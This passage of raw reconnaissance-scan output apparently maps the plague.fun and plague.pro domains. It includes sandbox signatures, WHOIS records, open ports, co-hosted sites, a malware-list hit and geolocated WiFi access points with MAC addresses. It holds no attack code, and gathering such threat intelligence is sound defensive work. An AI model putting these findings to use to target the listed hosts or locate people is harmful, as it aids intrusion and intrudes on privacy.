3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://womginx-proxy.toxictomato.repl.co/main/https:/pixiv.karakuri.ai/api/chats/popup.js', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d6c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n 
"IsoScope_d6c_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_d6c_IESQMMUTEX_0_303"\n "IsoScope_d6c_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_d6c_ConnHashTable<3436>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_d6c_IE_EarlyTabStart_0x83c_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3436"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"womginx-proxy.toxictomato.repl.co"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar64E7.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar668F.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"'}, {u'category': u'General', u'origin': u'String', 
u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /main/https:/pixiv.karakuri.ai/api/chats/popup.js HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: womginx-proxy.toxictomato.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /main/https:/pixiv.karakuri.ai/api/chats/popup.js HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: womginx-proxy.toxictomato.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab64D6.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab668E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': 
None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "5T4P5R4T.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5T4P5R4T.txt]- [targetUID: 00000000-00003436]\n Dropped file: "UVFQX8LP.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UVFQX8LP.txt]- [targetUID: 00000000-00003436]\n Dropped file: "T7XFVZAN.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\T7XFVZAN.txt]- [targetUID: 00000000-00003436]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002004]\n "_3CDD679F-5E30-11ED-B6C0-0800279D0805_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "Cab64D6.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab64D6.tmp]- [targetUID: 00000000-00002004]\n "background_gradient_1_" has type "JPEG image data JFIF standard 1.02 aspect ratio density 100x100 segment length 16 baseline precision 8 1x800 components 3"- [targetUID: N/A]\n "5T4P5R4T.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5T4P5R4T.txt]- [targetUID: 00000000-00003436]\n "bullet_1_" has type "PNG image data 15 x 15 8-bit colormap non-interlaced"- [targetUID: N/A]\n "~DF2996F56F13130F3E.TMP" has type "data"- Location: 
[%TEMP%\\~DF2996F56F13130F3E.TMP]- [targetUID: 00000000-00003436]\n "http_403_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "UVFQX8LP.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UVFQX8LP.txt]- [targetUID: 00000000-00003436]\n "JavaDeployReg.log" has type "ASCII text with CRLF line terminators"- Location: [%TEMP%\\JavaDeployReg.log]- [targetUID: 00000000-00002004]\n "~DFB2C05183636C570F.TMP" has type "data"- Location: [%TEMP%\\~DFB2C05183636C570F.TMP]- [targetUID: 00000000-00003436]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003436]\n "info_48_1_" has type "PNG image data 47 x 48 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002004]\n "RecoveryStore._3CDD679D-5E30-11ED-B6C0-0800279D0805_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "T7XFVZAN.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\T7XFVZAN.txt]- [targetUID: 00000000-00003436]\n "Tar64E7.tmp" has type "data"- Location: [%TEMP%\\Tar64E7.tmp]- [targetUID: 00000000-00002004]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /main/https:/pixiv.karakuri.ai/api/chats/popup.js HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 
(Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: womginx-proxy.toxictomato.repl.co\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 403 Forbidden\nContent-Length: 80\nContent-Type: application/javascript\nContent-Type: text/html\nDate: Mon, 07 Nov 2022 00:58:49 GMT\nExpect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"\nReplit-Cluster: global\nServer: nginx/1.20.1\nStrict-Transport-Security: max-age=7488101; includeSubDomains\n\n"'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://womginx-proxy.toxictomato.repl.co/main/https:/pixiv.karakuri.ai/api/chats/popup.js"\n Pattern match: "https://womginx-proxy.toxictomato.repl.co"\n Heuristic match: "womginx-proxy.toxictomato.repl.co"\n Pattern match: "pixiv.karakuri.ai/api/chats/popup.js"\n Pattern match: "https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"'}], u'threat_level': 0, u'size': None, u'job_id': u'63685626610e7538dc1ee633', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS 34.149.204.188 2022-12-18 00:27:45 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None plague.pro@regprivate.ru Domain Name: plague.pro Registry Domain ID: 63d81ab88f224721bf7defd24d12c687-DONUTS Registrar WHOIS Server: whois.reg.com Registrar URL: Updated Date: 2022-12-03T10:20:48Z Creation Date: 2018-11-20T18:17:14Z Registry Expiry Date: 2023-11-20T18:17:14Z Registrar: Registrar of Domain Names REG.RU LLC Registrar IANA ID: 1606 Registrar Abuse Contact Email: abuse@reg.ru Registrar Abuse Contact Phone: +7.4955801111 Domain Status: clientTransferProhibited 
https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Data Protected Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: ON Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: CA Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Name Server: rita.ns.cloudflare.com Name Server: augustus.ns.cloudflare.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:27:42Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. 
Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Domain name: PLAGUE.PRO Registry Domain ID: 63d81ab88f224721bf7defd24d12c687-DONUTS Registrar WHOIS Server: whois.reg.com Registrar URL: https://www.reg.com Registrar URL: https://www.reg.ru Updated Date: 2022-12-03T10:20:48Z Creation Date: 2018-11-20T18:17:14Z Registrar Registration Expiration Date: 2023-11-20T18:17:14Z Registrar: Registrar of domain names REG.RU LLC Registrar IANA ID: 1606 Registrar Abuse Contact Email: abuse@reg.ru Registrar Abuse Contact Phone: +7.4955801111 Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited Registrant ID: Registrant Name: Protection of Private Person Registrant Street: PO box 87, REG.RU Protection Service Registrant City: Moscow Registrant State/Province: Registrant Postal Code: 123007 Registrant Country: RU Registrant Phone: +7.4955801111 Registrant Phone Ext: Registrant Fax: +7.4955801111 Registrant Fax Ext: Registrant Email: PLAGUE.PRO@regprivate.ru Admin ID: Admin Name: Protection of Private Person Admin Street: PO box 87, REG.RU Protection Service Admin City: Moscow Admin State/Province: Admin Postal Code: 123007 Admin Country: RU Admin Phone: +7.4955801111 Admin Phone Ext: Admin Fax: +7.4955801111 Admin Fax Ext: 
Admin Email: PLAGUE.PRO@regprivate.ru Tech ID: Tech Name: Protection of Private Person Tech Street: PO box 87, REG.RU Protection Service Tech City: Moscow Tech State/Province: Tech Postal Code: 123007 Tech Country: RU Tech Phone: +7.4955801111 Tech Phone Ext: Tech Fax: +7.4955801111 Tech Fax Ext: Tech Email: PLAGUE.PRO@regprivate.ru Name Server: augustus.ns.cloudflare.com Name Server: rita.ns.cloudflare.com DNSSEC: Unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022.12.18T03:27:43Z <<< For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en. TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain information pertaining to Internet domain names registered by our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. 
All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com) 2022-12-18 00:21:54 Open TCP Port No Censys 0 0 2 0 None 104.21.7.179:2086 104.21.7.179 2022-12-18 00:21:20 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77b135839fef2d4c-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.97.1 2022-12-18 00:16:40 Blacklisted Affiliate Internet Name Yes DNS for Family 0 0 2 0 None DNS for Family [dns2.registrar-servers.com] dns2.registrar-servers.com 2022-12-18 00:31:07 Similar Domain Yes TLD Searcher 0 0 1 0 None plague.dog plague.fun 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None SurfandSip (Net ID: 00:02:2D:03:7C:7A) 37.7803446,-122.3906132 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNet8682 (Net ID: 00:01:36:5B:86:80) 37.7803446,-122.3906132 2022-12-18 00:02:47 Raw Data from RIRs No grep.app 0 0 1 0 None {u'repo': {u'raw': u'stamparm/maltrail'}, u'total_matches': {u'raw': u'1'}, u'content': {u'snippet': u'
8
utilities.tk
9
zerotwo-best-waifu.online
'}, u'branch': {u'raw': u'master'}, u'path': {u'raw': u'trails/static/malware/hacked_pypirepos.txt'}, u'id': {u'raw': u'g/stamparm/maltrail/trails/static/malware/hacked_pypirepos.txt'}, u'owner_id': {u'raw': u'921555'}} zerotwo-best-waifu.online 2022-12-18 00:03:26 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None 191.204.149.34.bc.googleusercontent.com 34.149.204.191 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None (Net ID: 00:02:2D:03:B5:60) 37.7803446,-122.3906132 2022-12-18 00:21:06 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 400 Bad Request Server: cloudflare Date: Content-Type: text/html Content-Length: 253 Connection: close CF-RAY: - 172.67.147.230 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNet8FBA (Net ID: 00:01:36:5C:8F:B8) 37.7803446,-122.3906132 2022-12-18 00:14:32 Country No Country Name Extractor 0 1 3 0 None Germany +492283296859 2022-12-18 00:20:36 BGP AS Membership No Censys 0 0 1 0 None 8075 137.117.157.128 2022-12-18 00:28:47 Physical Location No MetaDefender 0 0 3 0 None Firenze, Italy 81.88.48.102 2022-12-18 00:09:45 Physical Location No LeakIX 0 0 2 0 None Amsterdam, North Holland, Netherlands 188.114.96.9 2022-12-18 00:09:51 Co-Hosted Site No HackerTarget 0 0 2 0 None billing.cross.network 172.67.147.230 2022-12-18 00:06:04 Affiliate - Domain Name No DNS Resolver 0 0 2 0 None cloudflare.com journey.ns.cloudflare.com 2022-12-18 00:25:13 Affiliate - IP Address No DNS Look-aside 0 0 3 0 None 81.88.48.101 81.88.48.102 2022-12-18 00:12:19 Phone Number No Phone Number Extractor 0 0 2 0 None +3544212434 Domain Name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://www.namecheap.com/ Updated Date: 2022-10-26T19:30:44Z Creation Date: 2022-07-23T21:21:45Z Registry Expiry Date: 2023-07-23T21:21:45Z Registrar: NameCheap, Inc. 
Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:50Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. 
Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. 
Domain name: misogyny.wtf Registry Domain ID: 6b6c85a5f2d349d2b2f4dead736615e8-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 0001-01-01T00:00:00.00Z Creation Date: 2022-07-23T21:21:45.57Z Registrar Registration Expiration Date: 2023-07-23T21:21:45.57Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 7b20cf325f4f4ba4bc3a96b338b107cd.protect@withheldforprivacy.com Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ 
>>> Last update of WHOIS database: 2022-12-17T18:02:52.31Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:23:09 Raw Data from RIRs No CRXcavator 1 0 1 0 None plague.fun 2022-12-18 00:21:17 Open TCP Port No Censys 0 0 2 0 None 188.114.96.1:2082 188.114.96.1 2022-12-18 00:05:39 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None 34.149.204.188 2022-12-18 00:09:47 Co-Hosted Site No HackerTarget 0 0 2 0 None auto-cash.xyz 172.67.147.230 2022-12-18 00:16:27 SSL Certificate - Issued by No SSL Certificate Analyzer 0 0 2 0 None C=US,O=Cloudflare\, 
Inc.,CN=Cloudflare Inc ECC CA-3 188.114.96.9 2022-12-18 00:33:51 Similar Domain - Whois No Whois 0 0 2 0 None Malformed request. >>> Last update of WHOIS database: 2022-12-18T00:33:51Z <<<
plague.duckdns.org 2022-12-18 00:24:58 Affiliate - IP Address No DNS Look-aside 1 0 3 0 None 90.116.149.186 90.116.149.183 2022-12-18 00:03:10 Affiliate - IP Address No DNS Look-aside 2 0 2 0 None 81.88.52.234 81.88.52.232 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 00:02:2D:05:7E:8A (Net ID: 00:02:2D:05:7E:8A) 37.7803446,-122.3906132 2022-12-18 00:16:57 HTTP Headers No Web Spider 0 0 2 0 None {"content-length": "664", "content-encoding": "gzip", "accept-ranges": "bytes", "vary": "Accept-Encoding", "connection": "keep-alive", "cache-control": "public", "date": "Sun, 18 Dec 2022 00:14:25 GMT", "x-frame-options": "SAMEORIGIN", "content-type": "text/html; charset=UTF-8"} webmail.zerotwo-best-waifu.online 2022-12-18 00:02:53 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:a4:99:c7:6c:cb:8c:60:87:12:4d:ac:6d:aa:bc:48:46:46 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Jul 4 17:47:44 2022 GMT Not After : Oct 2 17:47:43 2022 GMT Subject: CN=*.plague.fun X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun plague.fun 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None Rock Chalk (Net ID: 00:01:95:08:D8:04) 37.780462,-122.390564 2022-12-18 00:03:18 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 04:a4:99:c7:6c:cb:8c:60:87:12:4d:ac:6d:aa:bc:48:46:46 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Jul 4 17:47:44 2022 GMT Not After : Oct 2 17:47:43 2022 GMT Subject: CN=*.plague.fun X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun 2022-12-18 00:32:13 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.top plague.fun 2022-12-18 00:09:45 Co-Hosted Site No 